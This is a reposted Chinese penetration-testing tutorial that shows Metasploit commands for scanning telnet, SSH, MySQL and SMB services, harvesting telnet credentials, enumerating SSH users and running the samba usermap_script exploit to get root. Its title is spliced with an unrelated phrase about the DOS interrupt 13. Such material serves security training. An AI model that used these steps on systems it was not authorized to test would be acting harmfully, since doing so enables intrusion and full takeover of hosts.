渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统...

主要功能:

  • msf   console的使用及其配置
  • msf的主要作用及其实例

主要功能介绍详情

  • msf   console的使用及其配置

启动服务:service postgresql  start 

如果先打开了msf的界面: msf > msfconsole

运行命令:msf> db_rebuild_cache   #如果显示数据库为连接

则运行命令:db_connect  #开启数据库的连接

也可以通过:db_status #查看数据库的连接状态

  • msf的主要作用及其实例
  1. 攻击远程Telnet服务器
    1. telnet服务器简述:常用的远程控制Web服务器的方法
    2. 渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统..._第1张图片

      登录远程服务器需要:域名、用户名、密码

    3. msf攻击telnet服务器的过程
      1. module:telnet_version
      2. show option #查看相应的参数
      3. msf> use auxiliary/scanner/telnet/telnet_version
      4. show options #
      5. set [params required yes] #设置必填参数
      6. Login with XXXX/XXX to get started。#从这条信息中,可以获取到目标主机Telnet服务的用户名和密码。此时可以尝试登录。
      7. telnet -l xxxx [targetIP]
  2. 攻击SSH模块
    1. search scanner/ssh #搜索有效的SSH模块
    2. use  auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
    3. show options
    4. exploit
  3. 扫描mysql服务器
    1. moudle:mysql_version
    2. msf>use auxiliary/scanner/mysql/mysql_version
    3. show options
    4. set [params required yes]
    5. exploit #渗透攻击
    6. 获取mysql的版本信息
      1.  

  4. samb服务的攻击
    1. smb服务简介:将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统
    2. msf攻击smb服务器的一般步骤
      1. module:smb_version
      2. msf>use auxiliary/scanner/smb/smb_version
      3. show options
      4. set [params required yes]   # set RHOSTS 192.168.1.0/24
      5. exploit # 启动扫描
      6. #查看扫描的信息 1、局域网内的正运行的samba服务器,及其操作系统类型
      7. search samba/usermap # 查看运行结果
      8. info [7中的usermap_scritp] 
      9. set RVHOST
      10. exploit # 启动渗透攻击
      11. 从[10]中可以知道攻击是否成功,如果成功 则可以获取目标主机的一些信息(id #查看当前登录用户的一些信息  uid=0 #root  gid =0 # root)

 

转载于:https://www.cnblogs.com/Erma/p/7281601.html

你可能感兴趣的:(渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统...)